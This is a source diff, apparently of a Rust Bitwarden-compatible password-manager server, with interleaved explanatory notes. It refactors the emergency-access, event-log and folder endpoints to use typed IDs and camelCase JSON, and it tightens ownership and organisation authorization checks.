-            None => err!("Grantee user not found."),
+        let Some(grantee_user) = User::find_by_uuid(grantee_uuid, &mut conn).await else {
+            err!("Grantee user not found.")
         };

         emergency_access.status = EmergencyAccessStatus::Confirmed as i32;
         emergency_access.save(&mut conn).await?;

         if CONFIG.mail_enabled() {
-            mail::send_emergency_access_recovery_rejected(&grantee_user.email, &grantor_user.name).await?;
+            mail::send_emergency_access_recovery_rejected(&grantee_user.email, &headers.user.name).await?;
         }
         Ok(Json(emergency_access.to_json()))
     } else {
@@ -584,12 +556,13 @@ async fn reject_emergency_access(emer_id: &str, headers: Headers, mut conn: DbConn) -> JsonResult {
 // region action

 #[post("/emergency-access/<emer_id>/view")]
-async fn view_emergency_access(emer_id: &str, headers: Headers, mut conn: DbConn) -> JsonResult {
+async fn view_emergency_access(emer_id: EmergencyAccessId, headers: Headers, mut conn: DbConn) -> JsonResult {
     check_emergency_access_enabled()?;

-    let emergency_access = match EmergencyAccess::find_by_uuid(emer_id, &mut conn).await {
-        Some(emer) => emer,
-        None => err!("Emergency access not valid."),
+    let Some(emergency_access) =
+        EmergencyAccess::find_by_uuid_and_grantee_uuid(&emer_id, &headers.user.uuid, &mut conn).await
+    else {
+        err!("Emergency access not valid.")
     };

     if !is_valid_request(&emergency_access, &headers.user.uuid, EmergencyAccessType::View) {
@@ -609,94 +582,94 @@ async fn view_emergency_access(emer_id: &str, headers: Headers, mut conn: DbConn) -> JsonResult {
                 CipherSyncType::User,
                 &mut conn,
             )
-            .await,
+            .await?,
         );
     }

     Ok(Json(json!({
-        "Ciphers": ciphers_json,
-        "KeyEncrypted": &emergency_access.key_encrypted,
-        "Object": "emergencyAccessView",
+        "ciphers": ciphers_json,
+        "keyEncrypted": &emergency_access.key_encrypted,
+        "object": "emergencyAccessView",
     })))
 }

 #[post("/emergency-access/<emer_id>/takeover")]
-async fn takeover_emergency_access(emer_id: &str, headers: Headers, mut conn: DbConn) -> JsonResult {
+async fn takeover_emergency_access(emer_id: EmergencyAccessId, headers: Headers, mut conn: DbConn) -> JsonResult {
     check_emergency_access_enabled()?;

     let requesting_user = headers.user;
-    let emergency_access = match EmergencyAccess::find_by_uuid(emer_id, &mut conn).await {
-        Some(emer) => emer,
-        None => err!("Emergency access not valid."),
+    let Some(emergency_access) =
+        EmergencyAccess::find_by_uuid_and_grantee_uuid(&emer_id, &requesting_user.uuid, &mut conn).await
+    else {
+        err!("Emergency access not valid.")
     };

     if !is_valid_request(&emergency_access, &requesting_user.uuid, EmergencyAccessType::Takeover) {
         err!("Emergency access not valid.")
     }

-    let grantor_user = match User::find_by_uuid(&emergency_access.grantor_uuid, &mut conn).await {
-        Some(user) => user,
-        None => err!("Grantor user not found."),
+    let Some(grantor_user) = User::find_by_uuid(&emergency_access.grantor_uuid, &mut conn).await else {
+        err!("Grantor user not found.")
     };

     let result = json!({
-        "Kdf": grantor_user.client_kdf_type,
-        "KdfIterations": grantor_user.client_kdf_iter,
-        "KdfMemory": grantor_user.client_kdf_memory,
-        "KdfParallelism": grantor_user.client_kdf_parallelism,
-        "KeyEncrypted": &emergency_access.key_encrypted,
-        "Object": "emergencyAccessTakeover",
+        "kdf": grantor_user.client_kdf_type,
+        "kdfIterations": grantor_user.client_kdf_iter,
+        "kdfMemory": grantor_user.client_kdf_memory,
+        "kdfParallelism": grantor_user.client_kdf_parallelism,
+        "keyEncrypted": &emergency_access.key_encrypted,
+        "object": "emergencyAccessTakeover",
     });

     Ok(Json(result))
 }

 #[derive(Deserialize)]
-#[allow(non_snake_case)]
+#[serde(rename_all = "camelCase")]
 struct EmergencyAccessPasswordData {
-    NewMasterPasswordHash: String,
-    Key: String,
+    new_master_password_hash: String,
+    key: String,
 }

 #[post("/emergency-access/<emer_id>/password", data = "<data>")]
 async fn password_emergency_access(
-    emer_id: &str,
-    data: JsonUpcase<EmergencyAccessPasswordData>,
+    emer_id: EmergencyAccessId,
+    data: Json<EmergencyAccessPasswordData>,
     headers: Headers,
     mut conn: DbConn,
 ) -> EmptyResult {
     check_emergency_access_enabled()?;

-    let data: EmergencyAccessPasswordData = data.into_inner().data;
-    let new_master_password_hash = &data.NewMasterPasswordHash;
+    let data: EmergencyAccessPasswordData = data.into_inner();
+    let new_master_password_hash = &data.new_master_password_hash;
     //let key = &data.Key;

     let requesting_user = headers.user;
-    let emergency_access = match EmergencyAccess::find_by_uuid(emer_id, &mut conn).await {
-        Some(emer) => emer,
-        None => err!("Emergency access not valid."),
+    let Some(emergency_access) =
+        EmergencyAccess::find_by_uuid_and_grantee_uuid(&emer_id, &requesting_user.uuid, &mut conn).await
+    else {
+        err!("Emergency access not valid.")
     };

     if !is_valid_request(&emergency_access, &requesting_user.uuid, EmergencyAccessType::Takeover) {
         err!("Emergency access not valid.")
     }

-    let mut grantor_user = match User::find_by_uuid(&emergency_access.grantor_uuid, &mut conn).await {
-        Some(user) => user,
-        None => err!("Grantor user not found."),
+    let Some(mut grantor_user) = User::find_by_uuid(&emergency_access.grantor_uuid, &mut conn).await else {
+        err!("Grantor user not found.")
     };

     // change grantor_user password
-    grantor_user.set_password(new_master_password_hash, Some(data.Key), true, None);
+    grantor_user.set_password(new_master_password_hash, Some(data.key), true, None);
     grantor_user.save(&mut conn).await?;

     // Disable TwoFactor providers since they will otherwise block logins
     TwoFactor::delete_all_by_user(&grantor_user.uuid, &mut conn).await?;

     // Remove grantor from all organisations unless Owner
-    for user_org in UserOrganization::find_any_state_by_user(&grantor_user.uuid, &mut conn).await {
-        if user_org.atype != UserOrgType::Owner as i32 {
-            user_org.delete(&mut conn).await?;
+    for member in Membership::find_any_state_by_user(&grantor_user.uuid, &mut conn).await {
+        if member.atype != MembershipType::Owner as i32 {
+            member.delete(&mut conn).await?;
         }
     }
     Ok(())
@@ -705,39 +678,39 @@ async fn password_emergency_access(
 // endregion

 #[get("/emergency-access/<emer_id>/policies")]
-async fn policies_emergency_access(emer_id: &str, headers: Headers, mut conn: DbConn) -> JsonResult {
+async fn policies_emergency_access(emer_id: EmergencyAccessId, headers: Headers, mut conn: DbConn) -> JsonResult {
     let requesting_user = headers.user;
-    let emergency_access = match EmergencyAccess::find_by_uuid(emer_id, &mut conn).await {
-        Some(emer) => emer,
-        None => err!("Emergency access not valid."),
+    let Some(emergency_access) =
+        EmergencyAccess::find_by_uuid_and_grantee_uuid(&emer_id, &requesting_user.uuid, &mut conn).await
+    else {
+        err!("Emergency access not valid.")
     };

     if !is_valid_request(&emergency_access, &requesting_user.uuid, EmergencyAccessType::Takeover) {
         err!("Emergency access not valid.")
     }

-    let grantor_user = match User::find_by_uuid(&emergency_access.grantor_uuid, &mut conn).await {
-        Some(user) => user,
-        None => err!("Grantor user not found."),
+    let Some(grantor_user) = User::find_by_uuid(&emergency_access.grantor_uuid, &mut conn).await else {
+        err!("Grantor user not found.")
     };

     let policies = OrgPolicy::find_confirmed_by_user(&grantor_user.uuid, &mut conn);
     let policies_json: Vec<Value> = policies.await.iter().map(OrgPolicy::to_json).collect();

     Ok(Json(json!({
-        "Data": policies_json,
-        "Object": "list",
-        "ContinuationToken": null
+        "data": policies_json,
+        "object": "list",
+        "continuationToken": null
     })))
 }

 fn is_valid_request(
     emergency_access: &EmergencyAccess,
-    requesting_user_uuid: &str,
+    requesting_user_id: &UserId,
     requested_access_type: EmergencyAccessType,
 ) -> bool {
     emergency_access.grantee_uuid.is_some()
-        && emergency_access.grantee_uuid.as_ref().unwrap() == requesting_user_uuid
+        && emergency_access.grantee_uuid.as_ref().unwrap() == requesting_user_id
         && emergency_access.status == EmergencyAccessStatus::RecoveryApproved as i32
         && emergency_access.atype == requested_access_type as i32
 }
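Note: `requesting_user_id: &UserId` in `is_valid_request` is part of a crate-wide switch from bare `&str` identifiers to dedicated newtypes (`UserId`, `EmergencyAccessId`, `OrganizationId`, `MembershipId`, ...). The definitions below are illustrative only — the real ones live in the crate's `db::models` and derive more traits — but they show what the newtypes buy:

    #[derive(Clone, Debug, PartialEq, Eq)]
    struct UserId(String);

    #[derive(Clone, Debug, PartialEq, Eq)]
    struct OrganizationId(String);

    fn audit(_user: &UserId, _org: &OrganizationId) {}

    fn main() {
        let user = UserId("u1".into());
        let org = OrganizationId("o1".into());
        audit(&user, &org);
        // audit(&org, &user); // compile error; a (&str, &str) signature would accept it
    }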
@@ -766,7 +739,7 @@ pub async fn emergency_request_timeout_job(pool: DbPool) {
     for mut emer in emergency_access_list {
         // The find_all_recoveries_initiated already checks if the recovery_initiated_at is not null (None)
         let recovery_allowed_at =
-            emer.recovery_initiated_at.unwrap() + Duration::days(i64::from(emer.wait_time_days));
+            emer.recovery_initiated_at.unwrap() + TimeDelta::try_days(i64::from(emer.wait_time_days)).unwrap();
         if recovery_allowed_at.le(&now) {
             // Only update the access status
             // Updating the whole record could cause issues when the emergency_notification_reminder_job is also active
@@ -822,10 +795,10 @@ pub async fn emergency_notification_reminder_job(pool: DbPool) {
         // The find_all_recoveries_initiated already checks if the recovery_initiated_at is not null (None)
         // Calculate the day before the recovery will become active
         let final_recovery_reminder_at =
-            emer.recovery_initiated_at.unwrap() + Duration::days(i64::from(emer.wait_time_days - 1));
+            emer.recovery_initiated_at.unwrap() + TimeDelta::try_days(i64::from(emer.wait_time_days - 1)).unwrap();
         // Calculate if a day has passed since the previous notification, else no notification has been sent before
         let next_recovery_reminder_at = if let Some(last_notification_at) = emer.last_notification_at {
-            last_notification_at + Duration::days(1)
+            last_notification_at + TimeDelta::try_days(1).unwrap()
         } else {
             now
         };
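Note: both background jobs above replace chrono's `Duration::days(n)`, which panics internally on out-of-range values, with `TimeDelta::try_days(n)`, which returns an `Option` and makes the failure point an explicit `.unwrap()`. A sketch, assuming chrono 0.4.34 or later:

    use chrono::TimeDelta;

    fn wait_period(days: i64) -> TimeDelta {
        // None only when the value would overflow; Duration::days used to panic here
        TimeDelta::try_days(days).unwrap()
    }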
@@ -5,10 +5,10 @@ use rocket::{form::FromForm, serde::json::Json, Route};
 use serde_json::Value;

 use crate::{
-    api::{EmptyResult, JsonResult, JsonUpcaseVec},
+    api::{EmptyResult, JsonResult},
     auth::{AdminHeaders, Headers},
     db::{
-        models::{Cipher, Event, UserOrganization},
+        models::{Cipher, CipherId, Event, Membership, MembershipId, OrganizationId, UserId},
         DbConn, DbPool,
     },
     util::parse_date,
@@ -22,7 +22,6 @@ pub fn routes() -> Vec<Route> {
 }

 #[derive(FromForm)]
-#[allow(non_snake_case)]
 struct EventRange {
     start: String,
     end: String,
@@ -30,9 +29,18 @@ struct EventRange {
     continuation_token: Option<String>,
 }

-// Upstream: https://github.com/bitwarden/server/blob/9ecf69d9cabce732cf2c57976dd9afa5728578fb/src/Api/Controllers/EventsController.cs#LL84C35-L84C41
+// Upstream: https://github.com/bitwarden/server/blob/9ebe16587175b1c0e9208f84397bb75d0d595510/src/Api/AdminConsole/Controllers/EventsController.cs#L87
 #[get("/organizations/<org_id>/events?<data..>")]
-async fn get_org_events(org_id: &str, data: EventRange, _headers: AdminHeaders, mut conn: DbConn) -> JsonResult {
+async fn get_org_events(
+    org_id: OrganizationId,
+    data: EventRange,
+    headers: AdminHeaders,
+    mut conn: DbConn,
+) -> JsonResult {
+    if org_id != headers.org_id {
+        err!("Organization not found", "Organization id's do not match");
+    }
+
     // Return an empty vec when we org events are disabled.
     // This prevents client errors
     let events_json: Vec<Value> = if !CONFIG.org_events_enabled() {
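Note: `get_org_events` previously ignored its admin headers entirely (`_headers`) and trusted the `org_id` taken from the URL. The added guard compares the path parameter against the organization the admin token was actually issued for, so an admin of one organization can no longer read another organization's event log by editing the URL; the same guard is added to `get_user_events` further down.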
@@ -45,7 +53,7 @@ async fn get_org_events(org_id: &str, data: EventRange, _headers: AdminHeaders, mut conn: DbConn) -> JsonResult {
         parse_date(&data.end)
     };

-    Event::find_by_organization_uuid(org_id, &start_date, &end_date, &mut conn)
+    Event::find_by_organization_uuid(&org_id, &start_date, &end_date, &mut conn)
         .await
         .iter()
         .map(|e| e.to_json())
@@ -53,21 +61,21 @@ async fn get_org_events(org_id: &str, data: EventRange, _headers: AdminHeaders, mut conn: DbConn) -> JsonResult {
     };

     Ok(Json(json!({
-        "Data": events_json,
-        "Object": "list",
-        "ContinuationToken": get_continuation_token(&events_json),
+        "data": events_json,
+        "object": "list",
+        "continuationToken": get_continuation_token(&events_json),
     })))
 }

 #[get("/ciphers/<cipher_id>/events?<data..>")]
-async fn get_cipher_events(cipher_id: &str, data: EventRange, headers: Headers, mut conn: DbConn) -> JsonResult {
+async fn get_cipher_events(cipher_id: CipherId, data: EventRange, headers: Headers, mut conn: DbConn) -> JsonResult {
     // Return an empty vec when we org events are disabled.
     // This prevents client errors
     let events_json: Vec<Value> = if !CONFIG.org_events_enabled() {
         Vec::with_capacity(0)
     } else {
         let mut events_json = Vec::with_capacity(0);
-        if UserOrganization::user_has_ge_admin_access_to_cipher(&headers.user.uuid, cipher_id, &mut conn).await {
+        if Membership::user_has_ge_admin_access_to_cipher(&headers.user.uuid, &cipher_id, &mut conn).await {
             let start_date = parse_date(&data.start);
             let end_date = if let Some(before_date) = &data.continuation_token {
                 parse_date(before_date)
@@ -75,7 +83,7 @@ async fn get_cipher_events(cipher_id: &str, data: EventRange, headers: Headers, mut conn: DbConn) -> JsonResult {
                 parse_date(&data.end)
             };

-            events_json = Event::find_by_cipher_uuid(cipher_id, &start_date, &end_date, &mut conn)
+            events_json = Event::find_by_cipher_uuid(&cipher_id, &start_date, &end_date, &mut conn)
                 .await
                 .iter()
                 .map(|e| e.to_json())
@@ -85,20 +93,23 @@ async fn get_cipher_events(cipher_id: &str, data: EventRange, headers: Headers, mut conn: DbConn) -> JsonResult {
     };

     Ok(Json(json!({
-        "Data": events_json,
-        "Object": "list",
-        "ContinuationToken": get_continuation_token(&events_json),
+        "data": events_json,
+        "object": "list",
+        "continuationToken": get_continuation_token(&events_json),
     })))
 }

-#[get("/organizations/<org_id>/users/<user_org_id>/events?<data..>")]
+#[get("/organizations/<org_id>/users/<member_id>/events?<data..>")]
 async fn get_user_events(
-    org_id: &str,
-    user_org_id: &str,
+    org_id: OrganizationId,
+    member_id: MembershipId,
     data: EventRange,
-    _headers: AdminHeaders,
+    headers: AdminHeaders,
     mut conn: DbConn,
 ) -> JsonResult {
+    if org_id != headers.org_id {
+        err!("Organization not found", "Organization id's do not match");
+    }
     // Return an empty vec when we org events are disabled.
     // This prevents client errors
     let events_json: Vec<Value> = if !CONFIG.org_events_enabled() {
@@ -111,7 +122,7 @@ async fn get_user_events(
         parse_date(&data.end)
     };

-    Event::find_by_org_and_user_org(org_id, user_org_id, &start_date, &end_date, &mut conn)
+    Event::find_by_org_and_member(&org_id, &member_id, &start_date, &end_date, &mut conn)
         .await
         .iter()
         .map(|e| e.to_json())
@@ -119,9 +130,9 @@ async fn get_user_events(
     };

     Ok(Json(json!({
-        "Data": events_json,
-        "Object": "list",
-        "ContinuationToken": get_continuation_token(&events_json),
+        "data": events_json,
+        "object": "list",
+        "continuationToken": get_continuation_token(&events_json),
     })))
 }

@@ -145,33 +156,33 @@ pub fn main_routes() -> Vec<Route> {
     routes![post_events_collect,]
 }

-#[derive(Deserialize, Debug)]
-#[allow(non_snake_case)]
+#[derive(Debug, Deserialize)]
+#[serde(rename_all = "camelCase")]
 struct EventCollection {
     // Mandatory
-    Type: i32,
-    Date: String,
+    r#type: i32,
+    date: String,

     // Optional
-    CipherId: Option<String>,
-    OrganizationId: Option<String>,
+    cipher_id: Option<CipherId>,
+    organization_id: Option<OrganizationId>,
 }

 // Upstream:
-// https://github.com/bitwarden/server/blob/8a22c0479e987e756ce7412c48a732f9002f0a2d/src/Events/Controllers/CollectController.cs
-// https://github.com/bitwarden/server/blob/8a22c0479e987e756ce7412c48a732f9002f0a2d/src/Core/Services/Implementations/EventService.cs
+// https://github.com/bitwarden/server/blob/9ebe16587175b1c0e9208f84397bb75d0d595510/src/Events/Controllers/CollectController.cs
+// https://github.com/bitwarden/server/blob/9ebe16587175b1c0e9208f84397bb75d0d595510/src/Core/AdminConsole/Services/Implementations/EventService.cs
 #[post("/collect", format = "application/json", data = "<data>")]
-async fn post_events_collect(data: JsonUpcaseVec<EventCollection>, headers: Headers, mut conn: DbConn) -> EmptyResult {
+async fn post_events_collect(data: Json<Vec<EventCollection>>, headers: Headers, mut conn: DbConn) -> EmptyResult {
     if !CONFIG.org_events_enabled() {
         return Ok(());
     }

-    for event in data.iter().map(|d| &d.data) {
-        let event_date = parse_date(&event.Date);
-        match event.Type {
+    for event in data.iter() {
+        let event_date = parse_date(&event.date);
+        match event.r#type {
             1000..=1099 => {
                 _log_user_event(
-                    event.Type,
+                    event.r#type,
                     &headers.user.uuid,
                     headers.device.atype,
                     Some(event_date),
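Note: `type` is a reserved keyword in Rust, so the camelCase migration names the field with raw-identifier syntax, `r#type`; serde strips the `r#` prefix when deriving the key name. A minimal sketch, assuming serde as a dependency:

    use serde::Deserialize;

    #[derive(Deserialize)]
    #[serde(rename_all = "camelCase")]
    struct EventCollection {
        r#type: i32,  // maps to the JSON key "type"
        date: String, // maps to "date"
    }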
@@ -181,11 +192,11 @@ async fn post_events_collect(data: JsonUpcaseVec<EventCollection>, headers: Headers, mut conn: DbConn) -> EmptyResult {
                 .await;
             }
             1600..=1699 => {
-                if let Some(org_uuid) = &event.OrganizationId {
+                if let Some(org_id) = &event.organization_id {
                     _log_event(
-                        event.Type,
-                        org_uuid,
-                        org_uuid,
+                        event.r#type,
+                        org_id,
+                        org_id,
                         &headers.user.uuid,
                         headers.device.atype,
                         Some(event_date),
@@ -196,13 +207,13 @@ async fn post_events_collect(data: JsonUpcaseVec<EventCollection>, headers: Headers, mut conn: DbConn) -> EmptyResult {
                 }
             }
             _ => {
-                if let Some(cipher_uuid) = &event.CipherId {
+                if let Some(cipher_uuid) = &event.cipher_id {
                     if let Some(cipher) = Cipher::find_by_uuid(cipher_uuid, &mut conn).await {
-                        if let Some(org_uuid) = cipher.organization_uuid {
+                        if let Some(org_id) = cipher.organization_uuid {
                             _log_event(
-                                event.Type,
+                                event.r#type,
                                 cipher_uuid,
-                                &org_uuid,
+                                &org_id,
                                 &headers.user.uuid,
                                 headers.device.atype,
                                 Some(event_date),
@@ -219,38 +230,39 @@ async fn post_events_collect(data: JsonUpcaseVec<EventCollection>, headers: Headers, mut conn: DbConn) -> EmptyResult {
     Ok(())
 }

-pub async fn log_user_event(event_type: i32, user_uuid: &str, device_type: i32, ip: &IpAddr, conn: &mut DbConn) {
+pub async fn log_user_event(event_type: i32, user_id: &UserId, device_type: i32, ip: &IpAddr, conn: &mut DbConn) {
     if !CONFIG.org_events_enabled() {
         return;
     }
-    _log_user_event(event_type, user_uuid, device_type, None, ip, conn).await;
+    _log_user_event(event_type, user_id, device_type, None, ip, conn).await;
 }

 async fn _log_user_event(
     event_type: i32,
-    user_uuid: &str,
+    user_id: &UserId,
     device_type: i32,
     event_date: Option<NaiveDateTime>,
     ip: &IpAddr,
     conn: &mut DbConn,
 ) {
-    let orgs = UserOrganization::get_org_uuid_by_user(user_uuid, conn).await;
-    let mut events: Vec<Event> = Vec::with_capacity(orgs.len() + 1); // We need an event per org and one without an org
+    let memberships = Membership::find_by_user(user_id, conn).await;
+    let mut events: Vec<Event> = Vec::with_capacity(memberships.len() + 1); // We need an event per org and one without an org

-    // Upstream saves the event also without any org_uuid.
+    // Upstream saves the event also without any org_id.
     let mut event = Event::new(event_type, event_date);
-    event.user_uuid = Some(String::from(user_uuid));
-    event.act_user_uuid = Some(String::from(user_uuid));
+    event.user_uuid = Some(user_id.clone());
+    event.act_user_uuid = Some(user_id.clone());
     event.device_type = Some(device_type);
     event.ip_address = Some(ip.to_string());
     events.push(event);

     // For each org a user is a member of store these events per org
-    for org_uuid in orgs {
+    for membership in memberships {
         let mut event = Event::new(event_type, event_date);
-        event.user_uuid = Some(String::from(user_uuid));
-        event.org_uuid = Some(org_uuid);
-        event.act_user_uuid = Some(String::from(user_uuid));
+        event.user_uuid = Some(user_id.clone());
+        event.org_uuid = Some(membership.org_uuid);
+        event.org_user_uuid = Some(membership.uuid);
+        event.act_user_uuid = Some(user_id.clone());
         event.device_type = Some(device_type);
         event.ip_address = Some(ip.to_string());
         events.push(event);
@@ -262,8 +274,8 @@ async fn _log_user_event(
 pub async fn log_event(
     event_type: i32,
     source_uuid: &str,
-    org_uuid: &str,
-    act_user_uuid: &str,
+    org_id: &OrganizationId,
+    act_user_id: &UserId,
     device_type: i32,
     ip: &IpAddr,
     conn: &mut DbConn,
@@ -271,15 +283,15 @@ pub async fn log_event(
     if !CONFIG.org_events_enabled() {
         return;
     }
-    _log_event(event_type, source_uuid, org_uuid, act_user_uuid, device_type, None, ip, conn).await;
+    _log_event(event_type, source_uuid, org_id, act_user_id, device_type, None, ip, conn).await;
 }

 #[allow(clippy::too_many_arguments)]
 async fn _log_event(
     event_type: i32,
     source_uuid: &str,
-    org_uuid: &str,
-    act_user_uuid: &str,
+    org_id: &OrganizationId,
+    act_user_id: &UserId,
     device_type: i32,
     event_date: Option<NaiveDateTime>,
     ip: &IpAddr,
@@ -289,33 +301,33 @@ async fn _log_event(
     let mut event = Event::new(event_type, event_date);
     match event_type {
         // 1000..=1099 Are user events, they need to be logged via log_user_event()
-        // Collection Events
+        // Cipher Events
         1100..=1199 => {
-            event.cipher_uuid = Some(String::from(source_uuid));
+            event.cipher_uuid = Some(source_uuid.to_string().into());
         }
         // Collection Events
         1300..=1399 => {
-            event.collection_uuid = Some(String::from(source_uuid));
+            event.collection_uuid = Some(source_uuid.to_string().into());
         }
         // Group Events
         1400..=1499 => {
-            event.group_uuid = Some(String::from(source_uuid));
+            event.group_uuid = Some(source_uuid.to_string().into());
         }
         // Org User Events
         1500..=1599 => {
-            event.org_user_uuid = Some(String::from(source_uuid));
+            event.org_user_uuid = Some(source_uuid.to_string().into());
         }
         // 1600..=1699 Are organizational events, and they do not need the source_uuid
         // Policy Events
         1700..=1799 => {
-            event.policy_uuid = Some(String::from(source_uuid));
+            event.policy_uuid = Some(source_uuid.to_string().into());
         }
         // Ignore others
         _ => {}
     }

-    event.org_uuid = Some(String::from(org_uuid));
-    event.act_user_uuid = Some(String::from(act_user_uuid));
+    event.org_uuid = Some(org_id.clone());
+    event.act_user_uuid = Some(act_user_id.clone());
     event.device_type = Some(device_type);
     event.ip_address = Some(ip.to_string());
     event.save(conn).await.unwrap_or(());
@@ -2,7 +2,7 @@ use rocket::serde::json::Json;
 use serde_json::Value;

 use crate::{
-    api::{EmptyResult, JsonResult, JsonUpcase, Notify, UpdateType},
+    api::{EmptyResult, JsonResult, Notify, UpdateType},
     auth::Headers,
     db::{models::*, DbConn},
 };
@@ -17,101 +17,86 @@ async fn get_folders(headers: Headers, mut conn: DbConn) -> Json<Value> {
     let folders_json: Vec<Value> = folders.iter().map(Folder::to_json).collect();

     Json(json!({
-        "Data": folders_json,
-        "Object": "list",
-        "ContinuationToken": null,
+        "data": folders_json,
+        "object": "list",
+        "continuationToken": null,
     }))
 }

-#[get("/folders/<uuid>")]
-async fn get_folder(uuid: &str, headers: Headers, mut conn: DbConn) -> JsonResult {
-    let folder = match Folder::find_by_uuid(uuid, &mut conn).await {
-        Some(folder) => folder,
-        _ => err!("Invalid folder"),
-    };
-
-    if folder.user_uuid != headers.user.uuid {
-        err!("Folder belongs to another user")
+#[get("/folders/<folder_id>")]
+async fn get_folder(folder_id: FolderId, headers: Headers, mut conn: DbConn) -> JsonResult {
+    match Folder::find_by_uuid_and_user(&folder_id, &headers.user.uuid, &mut conn).await {
+        Some(folder) => Ok(Json(folder.to_json())),
+        _ => err!("Invalid folder", "Folder does not exist or belongs to another user"),
     }
-
-    Ok(Json(folder.to_json()))
 }

 #[derive(Deserialize)]
-#[allow(non_snake_case)]
+#[serde(rename_all = "camelCase")]
 pub struct FolderData {
-    pub Name: String,
+    pub name: String,
+    pub id: Option<FolderId>,
 }

 #[post("/folders", data = "<data>")]
-async fn post_folders(data: JsonUpcase<FolderData>, headers: Headers, mut conn: DbConn, nt: Notify<'_>) -> JsonResult {
-    let data: FolderData = data.into_inner().data;
+async fn post_folders(data: Json<FolderData>, headers: Headers, mut conn: DbConn, nt: Notify<'_>) -> JsonResult {
    let data: FolderData = data.into_inner();

-    let mut folder = Folder::new(headers.user.uuid, data.Name);
+    let mut folder = Folder::new(headers.user.uuid, data.name);

     folder.save(&mut conn).await?;
-    nt.send_folder_update(UpdateType::SyncFolderCreate, &folder, &headers.device.uuid, &mut conn).await;
+    nt.send_folder_update(UpdateType::SyncFolderCreate, &folder, &headers.device, &mut conn).await;

     Ok(Json(folder.to_json()))
 }

-#[post("/folders/<uuid>", data = "<data>")]
+#[post("/folders/<folder_id>", data = "<data>")]
 async fn post_folder(
-    uuid: &str,
-    data: JsonUpcase<FolderData>,
+    folder_id: FolderId,
+    data: Json<FolderData>,
     headers: Headers,
     conn: DbConn,
     nt: Notify<'_>,
 ) -> JsonResult {
-    put_folder(uuid, data, headers, conn, nt).await
+    put_folder(folder_id, data, headers, conn, nt).await
 }

-#[put("/folders/<uuid>", data = "<data>")]
+#[put("/folders/<folder_id>", data = "<data>")]
 async fn put_folder(
-    uuid: &str,
-    data: JsonUpcase<FolderData>,
+    folder_id: FolderId,
+    data: Json<FolderData>,
     headers: Headers,
     mut conn: DbConn,
     nt: Notify<'_>,
 ) -> JsonResult {
-    let data: FolderData = data.into_inner().data;
+    let data: FolderData = data.into_inner();

-    let mut folder = match Folder::find_by_uuid(uuid, &mut conn).await {
-        Some(folder) => folder,
-        _ => err!("Invalid folder"),
+    let Some(mut folder) = Folder::find_by_uuid_and_user(&folder_id, &headers.user.uuid, &mut conn).await else {
+        err!("Invalid folder", "Folder does not exist or belongs to another user")
     };

-    if folder.user_uuid != headers.user.uuid {
-        err!("Folder belongs to another user")
-    }
-
-    folder.name = data.Name;
+    folder.name = data.name;

     folder.save(&mut conn).await?;
-    nt.send_folder_update(UpdateType::SyncFolderUpdate, &folder, &headers.device.uuid, &mut conn).await;
+    nt.send_folder_update(UpdateType::SyncFolderUpdate, &folder, &headers.device, &mut conn).await;

     Ok(Json(folder.to_json()))
 }

-#[post("/folders/<uuid>/delete")]
-async fn delete_folder_post(uuid: &str, headers: Headers, conn: DbConn, nt: Notify<'_>) -> EmptyResult {
-    delete_folder(uuid, headers, conn, nt).await
+#[post("/folders/<folder_id>/delete")]
+async fn delete_folder_post(folder_id: FolderId, headers: Headers, conn: DbConn, nt: Notify<'_>) -> EmptyResult {
+    delete_folder(folder_id, headers, conn, nt).await
 }

-#[delete("/folders/<uuid>")]
-async fn delete_folder(uuid: &str, headers: Headers, mut conn: DbConn, nt: Notify<'_>) -> EmptyResult {
-    let folder = match Folder::find_by_uuid(uuid, &mut conn).await {
-        Some(folder) => folder,
-        _ => err!("Invalid folder"),
+#[delete("/folders/<folder_id>")]
+async fn delete_folder(folder_id: FolderId, headers: Headers, mut conn: DbConn, nt: Notify<'_>) -> EmptyResult {
+    let Some(folder) = Folder::find_by_uuid_and_user(&folder_id, &headers.user.uuid, &mut conn).await else {
+        err!("Invalid folder", "Folder does not exist or belongs to another user")
     };

-    if folder.user_uuid != headers.user.uuid {
-        err!("Folder belongs to another user")
-    }
-
     // Delete the actual folder entry
     folder.delete(&mut conn).await?;

-    nt.send_folder_update(UpdateType::SyncFolderDelete, &folder, &headers.device.uuid, &mut conn).await;
+    nt.send_folder_update(UpdateType::SyncFolderDelete, &folder, &headers.device, &mut conn).await;
     Ok(())
 }
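Note: the folder handlers get the same hardening as emergency access: instead of fetching by uuid and then comparing `folder.user_uuid` to the caller, ownership becomes part of the query (`find_by_uuid_and_user`), so another user's folder is simply never returned and the check cannot be forgotten on a new endpoint. A plain-data sketch of the idea (the real version is a database query):

    struct Folder {
        uuid: String,
        user_uuid: String,
    }

    fn find_by_uuid_and_user<'a>(all: &'a [Folder], uuid: &str, user: &str) -> Option<&'a Folder> {
        // "missing" and "owned by someone else" are indistinguishable to the caller
        all.iter().find(|f| f.uuid == uuid && f.user_uuid == user)
    }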
@@ -12,12 +12,13 @@ pub use accounts::purge_auth_requests;
 pub use ciphers::{purge_trashed_ciphers, CipherData, CipherSyncData, CipherSyncType};
 pub use emergency_access::{emergency_notification_reminder_job, emergency_request_timeout_job};
 pub use events::{event_cleanup_job, log_event, log_user_event};
+use reqwest::Method;
 pub use sends::purge_sends;

 pub fn routes() -> Vec<Route> {
     let mut eq_domains_routes = routes![get_eq_domains, post_eq_domains, put_eq_domains];
     let mut hibp_routes = routes![hibp_breach];
-    let mut meta_routes = routes![alive, now, version, config];
+    let mut meta_routes = routes![alive, now, version, config, get_api_webauthn];

     let mut routes = Vec::new();
     routes.append(&mut accounts::routes());
@@ -49,19 +50,20 @@ pub fn events_routes() -> Vec<Route> {
 use rocket::{serde::json::Json, serde::json::Value, Catcher, Route};

 use crate::{
-    api::{JsonResult, JsonUpcase, Notify, UpdateType},
+    api::{JsonResult, Notify, UpdateType},
     auth::Headers,
     db::DbConn,
     error::Error,
-    util::{get_reqwest_client, parse_experimental_client_feature_flags},
+    http_client::make_http_request,
+    util::parse_experimental_client_feature_flags,
 };

-#[derive(Serialize, Deserialize, Debug)]
-#[allow(non_snake_case)]
+#[derive(Debug, Serialize, Deserialize)]
+#[serde(rename_all = "camelCase")]
 struct GlobalDomain {
-    Type: i32,
-    Domains: Vec<String>,
-    Excluded: bool,
+    r#type: i32,
+    domains: Vec<String>,
+    excluded: bool,
 }

 const GLOBAL_DOMAINS: &str = include_str!("../../static/global_domains.json");
@@ -81,38 +83,38 @@ fn _get_eq_domains(headers: Headers, no_excluded: bool) -> Json<Value> {
     let mut globals: Vec<GlobalDomain> = from_str(GLOBAL_DOMAINS).unwrap();

     for global in &mut globals {
